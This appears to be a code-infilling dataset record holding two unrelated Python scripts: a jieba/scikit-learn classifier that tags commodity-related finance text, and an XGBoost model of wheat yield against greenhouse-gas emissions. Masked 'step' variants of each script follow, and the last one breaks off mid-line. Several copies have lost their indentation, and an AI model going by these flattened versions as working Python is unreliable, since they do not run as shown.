from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.linear_model import RidgeClassifier
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import Perceptron
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import NearestCentroid
from sklearn.ensemble import RandomForestClassifier
from sklearn.utils.extmath import density
from sklearn import metrics
import jieba_cut
import random
import cPickle
import re
outputfile = 'dzsptfidf'
X_train, y_train = cPickle.load(open(os.path.join(outputfile, 'train.data'),
'rb'))
X_test, y_test = cPickle.load(open(os.path.join(outputfile, 'test.data'), 'rb')
)
vectorizer = cPickle.load(open(os.path.join(outputfile, 'vectorizer.data'),
'rb'))
chi2 = cPickle.load(open(os.path.join(outputfile, 'ch2.data'), 'rb'))
clf = cPickle.load(open(os.path.join(outputfile, 'SGD_l2.model'), 'rb'))
inputpath = u'E:\\项目需求\\JDPower\\分类\\5月份\\financeoutput1_final_05.txt'
outputpath = u'E:\\项目需求\\JDPower\\分类\\5月份\\大宗商品.txt'
label = '大宗商品'
forbidkword = {}
forbidpath = u'..//keyword.txt'
with open(forbidpath, 'rb') as f:
for line in f:
word = line.strip()
forbidkword[word] = 0
outfile = open(outputpath, 'wb')
with open(inputpath, 'rb') as f:
for line in f:
splits = line.strip().split('\t')
tag = splits[0]
if tag.find(label) > -1:
print(tag)
train = []
seg = jieba_cut.cut(splits[-1], cut_all=False)
seglist = []
for w in seg:
w = w.strip().encode('utf-8')
if w not in forbidkword:
if not re.match('\\d+$', w):
seglist.append(w)
train.append(' '.join(seglist))
X_test = vectorizer.transform(train)
X_test = chi2.transform(X_test)
pred = clf.predict(X_test)
print(pred)
lb = str(pred[0])
if lb == '1':
outfile.writelines(line.strip() + '\t')
outfile.writelines(lb + '\n')
outfile.close()
<|reserved_special_token_1|>
# -*- coding:UTF-8 -*-
from __future__ import print_function
import logging
import numpy as np
from optparse import OptionParser
import sys
from time import time
import matplotlib.pyplot as plt
import os
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.linear_model import RidgeClassifier
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import Perceptron
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import NearestCentroid
from sklearn.ensemble import RandomForestClassifier
from sklearn.utils.extmath import density
from sklearn import metrics
import jieba_cut
import random
import cPickle
import re
outputfile = "dzsptfidf"
X_train,y_train = cPickle.load(open(os.path.join(outputfile,"train.data"),"rb"))
X_test,y_test = cPickle.load(open(os.path.join(outputfile,"test.data"),"rb"))
vectorizer = cPickle.load(open(os.path.join(outputfile,"vectorizer.data"),"rb"))
chi2 = cPickle.load(open(os.path.join(outputfile,"ch2.data"),"rb"))
clf = cPickle.load(open(os.path.join(outputfile,"SGD_l2.model"),"rb"))
#inputpath =u"E:\\项目需求\\JDPower\\分类\\4月份\\financeoutput1_final.txt"
#outputpath =u"E:\\项目需求\\JDPower\\分类\\4月份\\大宗商品.txt"
inputpath =u"E:\\项目需求\\JDPower\\分类\\5月份\\financeoutput1_final_05.txt"
outputpath =u"E:\\项目需求\\JDPower\\分类\\5月份\\大宗商品.txt"
label = "大宗商品"
forbidkword = {}
# load
forbidpath = u"..//keyword.txt"
with open(forbidpath, "rb") as f:
for line in f:
word = line.strip()
forbidkword[word] = 0
outfile = open(outputpath,"wb")
with open(inputpath, "rb") as f:
for line in f:
splits = line.strip().split("\t")
tag = splits[0]
if tag.find(label) > -1 :
print(tag)
train = []
#print (splits[-1])
seg = jieba_cut.cut(splits[-1], cut_all=False)
#seglist = [i for i in seg]
seglist = []
for w in seg:
#print w
w = w.strip().encode("utf-8")
if w not in forbidkword:
if not re.match(r"\d+$", w):
seglist.append(w)
train.append(" ".join(seglist))
X_test = vectorizer.transform(train)
X_test = chi2.transform(X_test)
pred = clf.predict(X_test)
#print(" ".join(pred))
print (pred)
lb = str(pred[0])
#print(isinstance(lb, unicode))
#print( lb.decode("gbk").encode("utf-8"))
#outfile.writelines(lb+"\n")
if lb == '1' :
outfile.writelines(line.strip()+"\t")
outfile.writelines(lb+"\n")
#outfile.writelines(line.strip()+"\t"+lb.decode("utf-8").encode("utf-8")+"\n")
outfile.close()
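# Note: each matching line is transformed with the persisted TfidfVectorizer and
# chi2 selector before prediction, i.e. the same feature pipeline the SGD model
# was trained on; predicting line-by-line is simple but slower than batching.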
|
flexible
|
{
"blob_id": "84a516e924252d897be7444e11acfecd66474090",
"index": 1177,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(forbidpath, 'rb') as f:\n for line in f:\n word = line.strip()\n forbidkword[word] = 0\n<mask token>\nwith open(inputpath, 'rb') as f:\n for line in f:\n splits = line.strip().split('\\t')\n tag = splits[0]\n if tag.find(label) > -1:\n print(tag)\n train = []\n seg = jieba_cut.cut(splits[-1], cut_all=False)\n seglist = []\n for w in seg:\n w = w.strip().encode('utf-8')\n if w not in forbidkword:\n if not re.match('\\\\d+$', w):\n seglist.append(w)\n train.append(' '.join(seglist))\n X_test = vectorizer.transform(train)\n X_test = chi2.transform(X_test)\n pred = clf.predict(X_test)\n print(pred)\n lb = str(pred[0])\n if lb == '1':\n outfile.writelines(line.strip() + '\\t')\n outfile.writelines(lb + '\\n')\noutfile.close()\n",
"step-3": "<mask token>\noutputfile = 'dzsptfidf'\nX_train, y_train = cPickle.load(open(os.path.join(outputfile, 'train.data'),\n 'rb'))\nX_test, y_test = cPickle.load(open(os.path.join(outputfile, 'test.data'), 'rb')\n )\nvectorizer = cPickle.load(open(os.path.join(outputfile, 'vectorizer.data'),\n 'rb'))\nchi2 = cPickle.load(open(os.path.join(outputfile, 'ch2.data'), 'rb'))\nclf = cPickle.load(open(os.path.join(outputfile, 'SGD_l2.model'), 'rb'))\ninputpath = u'E:\\\\项目需求\\\\JDPower\\\\分类\\\\5月份\\\\financeoutput1_final_05.txt'\noutputpath = u'E:\\\\项目需求\\\\JDPower\\\\分类\\\\5月份\\\\大宗商品.txt'\nlabel = '大宗商品'\nforbidkword = {}\nforbidpath = u'..//keyword.txt'\nwith open(forbidpath, 'rb') as f:\n for line in f:\n word = line.strip()\n forbidkword[word] = 0\noutfile = open(outputpath, 'wb')\nwith open(inputpath, 'rb') as f:\n for line in f:\n splits = line.strip().split('\\t')\n tag = splits[0]\n if tag.find(label) > -1:\n print(tag)\n train = []\n seg = jieba_cut.cut(splits[-1], cut_all=False)\n seglist = []\n for w in seg:\n w = w.strip().encode('utf-8')\n if w not in forbidkword:\n if not re.match('\\\\d+$', w):\n seglist.append(w)\n train.append(' '.join(seglist))\n X_test = vectorizer.transform(train)\n X_test = chi2.transform(X_test)\n pred = clf.predict(X_test)\n print(pred)\n lb = str(pred[0])\n if lb == '1':\n outfile.writelines(line.strip() + '\\t')\n outfile.writelines(lb + '\\n')\noutfile.close()\n",
"step-4": "from __future__ import print_function\nimport logging\nimport numpy as np\nfrom optparse import OptionParser\nimport sys\nfrom time import time\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import HashingVectorizer\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom sklearn.linear_model import RidgeClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.naive_bayes import BernoulliNB, MultinomialNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import NearestCentroid\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.utils.extmath import density\nfrom sklearn import metrics\nimport jieba_cut\nimport random\nimport cPickle\nimport re\noutputfile = 'dzsptfidf'\nX_train, y_train = cPickle.load(open(os.path.join(outputfile, 'train.data'),\n 'rb'))\nX_test, y_test = cPickle.load(open(os.path.join(outputfile, 'test.data'), 'rb')\n )\nvectorizer = cPickle.load(open(os.path.join(outputfile, 'vectorizer.data'),\n 'rb'))\nchi2 = cPickle.load(open(os.path.join(outputfile, 'ch2.data'), 'rb'))\nclf = cPickle.load(open(os.path.join(outputfile, 'SGD_l2.model'), 'rb'))\ninputpath = u'E:\\\\项目需求\\\\JDPower\\\\分类\\\\5月份\\\\financeoutput1_final_05.txt'\noutputpath = u'E:\\\\项目需求\\\\JDPower\\\\分类\\\\5月份\\\\大宗商品.txt'\nlabel = '大宗商品'\nforbidkword = {}\nforbidpath = u'..//keyword.txt'\nwith open(forbidpath, 'rb') as f:\n for line in f:\n word = line.strip()\n forbidkword[word] = 0\noutfile = open(outputpath, 'wb')\nwith open(inputpath, 'rb') as f:\n for line in f:\n splits = line.strip().split('\\t')\n tag = splits[0]\n if tag.find(label) > -1:\n print(tag)\n train = []\n seg = jieba_cut.cut(splits[-1], cut_all=False)\n seglist = []\n for w in seg:\n w = w.strip().encode('utf-8')\n if w not in forbidkword:\n if not re.match('\\\\d+$', w):\n seglist.append(w)\n train.append(' '.join(seglist))\n X_test = vectorizer.transform(train)\n X_test = chi2.transform(X_test)\n pred = clf.predict(X_test)\n print(pred)\n lb = str(pred[0])\n if lb == '1':\n outfile.writelines(line.strip() + '\\t')\n outfile.writelines(lb + '\\n')\noutfile.close()\n",
"step-5": "# -*- coding:UTF-8 -*-\nfrom __future__ import print_function\nimport logging\nimport numpy as np\nfrom optparse import OptionParser\nimport sys\nfrom time import time\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import HashingVectorizer\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom sklearn.linear_model import RidgeClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.naive_bayes import BernoulliNB, MultinomialNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import NearestCentroid\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.utils.extmath import density\nfrom sklearn import metrics\nimport jieba_cut\nimport random\nimport cPickle\nimport re\noutputfile = \"dzsptfidf\"\nX_train,y_train = cPickle.load(open(os.path.join(outputfile,\"train.data\"),\"rb\"))\nX_test,y_test = cPickle.load(open(os.path.join(outputfile,\"test.data\"),\"rb\"))\nvectorizer = cPickle.load(open(os.path.join(outputfile,\"vectorizer.data\"),\"rb\"))\nchi2 = cPickle.load(open(os.path.join(outputfile,\"ch2.data\"),\"rb\"))\nclf = cPickle.load(open(os.path.join(outputfile,\"SGD_l2.model\"),\"rb\"))\n#inputpath =u\"E:\\\\项目需求\\\\JDPower\\\\分类\\\\4月份\\\\financeoutput1_final.txt\"\n#outputpath =u\"E:\\\\项目需求\\\\JDPower\\\\分类\\\\4月份\\\\大宗商品.txt\"\n\ninputpath =u\"E:\\\\项目需求\\\\JDPower\\\\分类\\\\5月份\\\\financeoutput1_final_05.txt\"\noutputpath =u\"E:\\\\项目需求\\\\JDPower\\\\分类\\\\5月份\\\\大宗商品.txt\"\n\nlabel = \"大宗商品\"\n\nforbidkword = {}\n# load\n\nforbidpath = u\"..//keyword.txt\"\nwith open(forbidpath, \"rb\") as f:\n for line in f:\n word = line.strip()\n forbidkword[word] = 0\n\noutfile = open(outputpath,\"wb\")\nwith open(inputpath, \"rb\") as f:\n for line in f:\n splits = line.strip().split(\"\\t\")\n tag = splits[0]\n\n if tag.find(label) > -1 :\n print(tag)\n train = []\n #print (splits[-1])\n seg = jieba_cut.cut(splits[-1], cut_all=False)\n #seglist = [i for i in seg]\n seglist = []\n for w in seg:\n #print w\n w = w.strip().encode(\"utf-8\")\n if w not in forbidkword:\n if not re.match(r\"\\d+$\", w):\n seglist.append(w)\n train.append(\" \".join(seglist))\n X_test = vectorizer.transform(train)\n X_test = chi2.transform(X_test)\n pred = clf.predict(X_test)\n #print(\" \".join(pred))\n print (pred)\n lb = str(pred[0])\n #print(isinstance(lb, unicode))\n #print( lb.decode(\"gbk\").encode(\"utf-8\"))\n #outfile.writelines(lb+\"\\n\")\n if lb == '1' :\n outfile.writelines(line.strip()+\"\\t\")\n outfile.writelines(lb+\"\\n\")\n #outfile.writelines(line.strip()+\"\\t\"+lb.decode(\"utf-8\").encode(\"utf-8\")+\"\\n\")\noutfile.close()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def predict(model, row):
preds = []
for perc in range(-10, 11):
new_row = row.copy()
row_copy = row.copy()
new_row = new_row.drop(labels=['Area', 'Year', 'Crop',
'Previous crop', 'Yield'])
nitrogen = new_row['N'] * ((100 + perc) / 100)
new_row['N'] = nitrogen
row_copy['N'] = nitrogen
new_row = np.array([new_row])
pred = model.predict(new_row)
row_df = pd.DataFrame([row_copy])
fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')
fuel_ghg = fuel_ghg.values[0]
ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],
row_df['Area'], row_df['Crop'], row_df['Yield'])
ms_ghg = ms_ghg.values[0]
sum_ghg = fuel_ghg + ms_ghg
area = row_df['Area'].iloc[0]
preds.append([nitrogen, pred[0], sum_ghg])
print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'
.format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))
return preds
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
model.fit(X_train, Y_train)
print(dataset_df_2.columns)
print(model.feature_importances_)
<|reserved_special_token_0|>
def predict(model, row):
preds = []
for perc in range(-10, 11):
new_row = row.copy()
row_copy = row.copy()
new_row = new_row.drop(labels=['Area', 'Year', 'Crop',
'Previous crop', 'Yield'])
nitrogen = new_row['N'] * ((100 + perc) / 100)
new_row['N'] = nitrogen
row_copy['N'] = nitrogen
new_row = np.array([new_row])
pred = model.predict(new_row)
row_df = pd.DataFrame([row_copy])
fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')
fuel_ghg = fuel_ghg.values[0]
ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],
row_df['Area'], row_df['Crop'], row_df['Yield'])
ms_ghg = ms_ghg.values[0]
sum_ghg = fuel_ghg + ms_ghg
area = row_df['Area'].iloc[0]
preds.append([nitrogen, pred[0], sum_ghg])
print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'
.format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))
return preds
<|reserved_special_token_0|>
while rand_row['N'] == 0:
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
<|reserved_special_token_0|>
ax1.set_xlabel('N')
ax1.set_ylabel('Yield (t)', color=color)
ax1.set_title(f"GHG and yield predictions (Area: {rand_row['Area']} ha)")
ax1.plot(n_amount, yield_p, color=color)
ax1.tick_params(axis='y', labelcolor=color)
<|reserved_special_token_0|>
ax2.set_ylabel('CO2 (kg)', color=color)
ax2.plot(n_amount, ghg_p, color=color)
ax2.tick_params(axis='y', labelcolor=color)
print(n_amount)
fig.tight_layout()
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
predictor = GHGPredictor()
dataset_df = pd.read_csv('db-wheat.csv', index_col=0)
dataset_df_2 = dataset_df.drop(columns=['Area', 'Year', 'Crop',
'Previous crop'])
dataset = dataset_df_2.to_numpy()
X, Y = dataset[:, :-1], dataset[:, -1:]
seed = 10
test_size = 0.2
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=
test_size, random_state=seed)
model = XGBRegressor()
model.fit(X_train, Y_train)
print(dataset_df_2.columns)
print(model.feature_importances_)
y_pred = model.predict(X_test)
Y_test = map(lambda x: x[0], Y_test)
res = zip(y_pred, Y_test)
ghg_predictor = GHGPredictor()
def predict(model, row):
preds = []
for perc in range(-10, 11):
new_row = row.copy()
row_copy = row.copy()
new_row = new_row.drop(labels=['Area', 'Year', 'Crop',
'Previous crop', 'Yield'])
nitrogen = new_row['N'] * ((100 + perc) / 100)
new_row['N'] = nitrogen
row_copy['N'] = nitrogen
new_row = np.array([new_row])
pred = model.predict(new_row)
row_df = pd.DataFrame([row_copy])
fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')
fuel_ghg = fuel_ghg.values[0]
ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],
row_df['Area'], row_df['Crop'], row_df['Yield'])
ms_ghg = ms_ghg.values[0]
sum_ghg = fuel_ghg + ms_ghg
area = row_df['Area'].iloc[0]
preds.append([nitrogen, pred[0], sum_ghg])
print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'
.format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))
return preds
<|reserved_special_token_0|>
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
while rand_row['N'] == 0:
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
preds = predict(model, rand_row)
<|reserved_special_token_0|>
fig, ax1 = plt.subplots()
n_amount = [x[0] for x in preds]
yield_p = [x[1] for x in preds]
ghg_p = [x[2] for x in preds]
color = 'tab:red'
ax1.set_xlabel('N')
ax1.set_ylabel('Yield (t)', color=color)
ax1.set_title(f"GHG and yield predictions (Area: {rand_row['Area']} ha)")
ax1.plot(n_amount, yield_p, color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx()
color = 'tab:blue'
ax2.set_ylabel('CO2 (kg)', color=color)
ax2.plot(n_amount, ghg_p, color=color)
ax2.tick_params(axis='y', labelcolor=color)
print(n_amount)
fig.tight_layout()
plt.show()
<|reserved_special_token_1|>
from xgboost import XGBRegressor
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
import pandas as pd
import numpy as np
from ghg import GHGPredictor
predictor = GHGPredictor()
dataset_df = pd.read_csv('db-wheat.csv', index_col=0)
dataset_df_2 = dataset_df.drop(columns=['Area', 'Year', 'Crop',
'Previous crop'])
dataset = dataset_df_2.to_numpy()
X, Y = dataset[:, :-1], dataset[:, -1:]
seed = 10
test_size = 0.2
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=
test_size, random_state=seed)
model = XGBRegressor()
model.fit(X_train, Y_train)
print(dataset_df_2.columns)
print(model.feature_importances_)
y_pred = model.predict(X_test)
Y_test = map(lambda x: x[0], Y_test)
res = zip(y_pred, Y_test)
ghg_predictor = GHGPredictor()
def predict(model, row):
preds = []
for perc in range(-10, 11):
new_row = row.copy()
row_copy = row.copy()
new_row = new_row.drop(labels=['Area', 'Year', 'Crop',
'Previous crop', 'Yield'])
nitrogen = new_row['N'] * ((100 + perc) / 100)
new_row['N'] = nitrogen
row_copy['N'] = nitrogen
new_row = np.array([new_row])
pred = model.predict(new_row)
row_df = pd.DataFrame([row_copy])
fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')
fuel_ghg = fuel_ghg.values[0]
ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],
row_df['Area'], row_df['Crop'], row_df['Yield'])
ms_ghg = ms_ghg.values[0]
sum_ghg = fuel_ghg + ms_ghg
area = row_df['Area'].iloc[0]
preds.append([nitrogen, pred[0], sum_ghg])
print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'
.format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))
return preds
import random
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
while rand_row['N'] == 0:
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
preds = predict(model, rand_row)
import matplotlib.pyplot as plt
fig, ax1 = plt.subplots()
n_amount = [x[0] for x in preds]
yield_p = [x[1] for x in preds]
ghg_p = [x[2] for x in preds]
color = 'tab:red'
ax1.set_xlabel('N')
ax1.set_ylabel('Yield (t)', color=color)
ax1.set_title(f"GHG and yield predictions (Area: {rand_row['Area']} ha)")
ax1.plot(n_amount, yield_p, color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx()
color = 'tab:blue'
ax2.set_ylabel('CO2 (kg)', color=color)
ax2.plot(n_amount, ghg_p, color=color)
ax2.tick_params(axis='y', labelcolor=color)
print(n_amount)
fig.tight_layout()
plt.show()
<|reserved_special_token_1|>
from xgboost import XGBRegressor
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
import pandas as pd
import numpy as np
from ghg import GHGPredictor
predictor = GHGPredictor()
dataset_df = pd.read_csv("db-wheat.csv", index_col=0)
# print(dataset_df.iloc[1])
dataset_df_2 = dataset_df.drop(columns=['Area', 'Year', 'Crop', 'Previous crop'])
# print(dataset_df_2)
dataset = dataset_df_2.to_numpy()
# print(dataset)
X, Y = dataset[:, :-1], dataset[:, -1:]
# print(X)
# print(Y)
seed = 10
test_size = 0.2
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=test_size, random_state=seed)
# print(len(X_train))
# print(len(X_test))
# print(len(Y_train))
# print(len(Y_test))
model = XGBRegressor()
model.fit(X_train, Y_train)
# print(model)
print(dataset_df_2.columns)
print(model.feature_importances_)
# print(X_test.shape)
y_pred = model.predict(X_test)
# predictions = [round(value) for value in y_pred]
Y_test = map(lambda x: x[0], Y_test)
# print(Y_test)
res = zip(y_pred, Y_test)
# print(list(res))
ghg_predictor = GHGPredictor()
def predict(model, row):
preds = []
# print(row)
# print(row.).shape)
for perc in range(-10, 11):
new_row = row.copy()
row_copy = row.copy()
# new_row = new_row.iloc[0]
new_row = new_row.drop(labels=['Area', 'Year', 'Crop', 'Previous crop', 'Yield'])
# print(new_row.labels)
# new_row = new_row.tolist()
# print(new_row)
# print(type(new_row))
nitrogen = new_row['N'] * ((100 + perc) / 100)
new_row['N'] = nitrogen
row_copy['N'] = nitrogen
new_row = np.array([new_row])
# print(new_row)
pred = model.predict(new_row)
row_df = pd.DataFrame([row_copy])
fuel_ghg = predictor.fuel_ghg_emissions(row_df["Area"], unit="kg")
fuel_ghg = fuel_ghg.values[0]
ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'], row_df['Area'], row_df['Crop'], row_df['Yield'])
ms_ghg = ms_ghg.values[0]
sum_ghg = fuel_ghg + ms_ghg
area = row_df['Area'].iloc[0]
# print(area)
# print(sum_ghg)
# print(row_df['N'])
# print(sum_ghg)
# GHG
# fuel = ghg_predictor.fuel_ghg_emissions()
preds.append([nitrogen, pred[0], sum_ghg])
print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'.format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))
return preds
# accuracy = accuracy_score(Y_test, predictions)
# print("Accuracy: %.2f%%" % (accuracy * 100.0))
import random
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
while rand_row['N'] == 0:
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
# rand_row = rand_row[:-1]
preds = predict(model, rand_row)
import matplotlib.pyplot as plt
fig, ax1 = plt.subplots()
n_amount = [x[0] for x in preds]
yield_p = [x[1] for x in preds]
ghg_p = [x[2] for x in preds]
color = 'tab:red'
ax1.set_xlabel('N')
ax1.set_ylabel('Yield (t)', color=color)
ax1.set_title(f'GHG and yield predictions (Area: {rand_row["Area"]} ha)')
ax1.plot(n_amount, yield_p, color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:blue'
ax2.set_ylabel('CO2 (kg)', color=color) # we already handled the x-label with ax1
ax2.plot(n_amount, ghg_p, color=color)
ax2.tick_params(axis='y', labelcolor=color)
print(n_amount)
fig.tight_layout() # otherwise the right y-label is slightly clipped
plt.show()
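# Note: the predict() sweep above varies N from 90% to 110% of the recorded value
# (range(-10, 11)), so the figure plots predicted yield (red, left axis) against
# the estimated CO2 emissions (blue, right axis) for each nitrogen level.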
|
flexible
|
{
"blob_id": "0ebd3ca5fd29b0f2f2149dd162b37f39668f1c58",
"index": 7397,
"step-1": "<mask token>\n\n\ndef predict(model, row):\n preds = []\n for perc in range(-10, 11):\n new_row = row.copy()\n row_copy = row.copy()\n new_row = new_row.drop(labels=['Area', 'Year', 'Crop',\n 'Previous crop', 'Yield'])\n nitrogen = new_row['N'] * ((100 + perc) / 100)\n new_row['N'] = nitrogen\n row_copy['N'] = nitrogen\n new_row = np.array([new_row])\n pred = model.predict(new_row)\n row_df = pd.DataFrame([row_copy])\n fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')\n fuel_ghg = fuel_ghg.values[0]\n ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],\n row_df['Area'], row_df['Crop'], row_df['Yield'])\n ms_ghg = ms_ghg.values[0]\n sum_ghg = fuel_ghg + ms_ghg\n area = row_df['Area'].iloc[0]\n preds.append([nitrogen, pred[0], sum_ghg])\n print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'\n .format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))\n return preds\n\n\n<mask token>\n",
"step-2": "<mask token>\nmodel.fit(X_train, Y_train)\nprint(dataset_df_2.columns)\nprint(model.feature_importances_)\n<mask token>\n\n\ndef predict(model, row):\n preds = []\n for perc in range(-10, 11):\n new_row = row.copy()\n row_copy = row.copy()\n new_row = new_row.drop(labels=['Area', 'Year', 'Crop',\n 'Previous crop', 'Yield'])\n nitrogen = new_row['N'] * ((100 + perc) / 100)\n new_row['N'] = nitrogen\n row_copy['N'] = nitrogen\n new_row = np.array([new_row])\n pred = model.predict(new_row)\n row_df = pd.DataFrame([row_copy])\n fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')\n fuel_ghg = fuel_ghg.values[0]\n ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],\n row_df['Area'], row_df['Crop'], row_df['Yield'])\n ms_ghg = ms_ghg.values[0]\n sum_ghg = fuel_ghg + ms_ghg\n area = row_df['Area'].iloc[0]\n preds.append([nitrogen, pred[0], sum_ghg])\n print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'\n .format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))\n return preds\n\n\n<mask token>\nwhile rand_row['N'] == 0:\n rand_ind = random.randrange(0, len(dataset))\n rand_row = dataset_df.iloc[rand_ind]\n<mask token>\nax1.set_xlabel('N')\nax1.set_ylabel('Yield (t)', color=color)\nax1.set_title(f\"GHG and yield predictions (Area: {rand_row['Area']} ha)\")\nax1.plot(n_amount, yield_p, color=color)\nax1.tick_params(axis='y', labelcolor=color)\n<mask token>\nax2.set_ylabel('CO2 (kg)', color=color)\nax2.plot(n_amount, ghg_p, color=color)\nax2.tick_params(axis='y', labelcolor=color)\nprint(n_amount)\nfig.tight_layout()\nplt.show()\n",
"step-3": "<mask token>\npredictor = GHGPredictor()\ndataset_df = pd.read_csv('db-wheat.csv', index_col=0)\ndataset_df_2 = dataset_df.drop(columns=['Area', 'Year', 'Crop',\n 'Previous crop'])\ndataset = dataset_df_2.to_numpy()\nX, Y = dataset[:, :-1], dataset[:, -1:]\nseed = 10\ntest_size = 0.2\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=\n test_size, random_state=seed)\nmodel = XGBRegressor()\nmodel.fit(X_train, Y_train)\nprint(dataset_df_2.columns)\nprint(model.feature_importances_)\ny_pred = model.predict(X_test)\nY_test = map(lambda x: x[0], Y_test)\nres = zip(y_pred, Y_test)\nghg_predictor = GHGPredictor()\n\n\ndef predict(model, row):\n preds = []\n for perc in range(-10, 11):\n new_row = row.copy()\n row_copy = row.copy()\n new_row = new_row.drop(labels=['Area', 'Year', 'Crop',\n 'Previous crop', 'Yield'])\n nitrogen = new_row['N'] * ((100 + perc) / 100)\n new_row['N'] = nitrogen\n row_copy['N'] = nitrogen\n new_row = np.array([new_row])\n pred = model.predict(new_row)\n row_df = pd.DataFrame([row_copy])\n fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')\n fuel_ghg = fuel_ghg.values[0]\n ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],\n row_df['Area'], row_df['Crop'], row_df['Yield'])\n ms_ghg = ms_ghg.values[0]\n sum_ghg = fuel_ghg + ms_ghg\n area = row_df['Area'].iloc[0]\n preds.append([nitrogen, pred[0], sum_ghg])\n print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'\n .format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))\n return preds\n\n\n<mask token>\nrand_ind = random.randrange(0, len(dataset))\nrand_row = dataset_df.iloc[rand_ind]\nwhile rand_row['N'] == 0:\n rand_ind = random.randrange(0, len(dataset))\n rand_row = dataset_df.iloc[rand_ind]\npreds = predict(model, 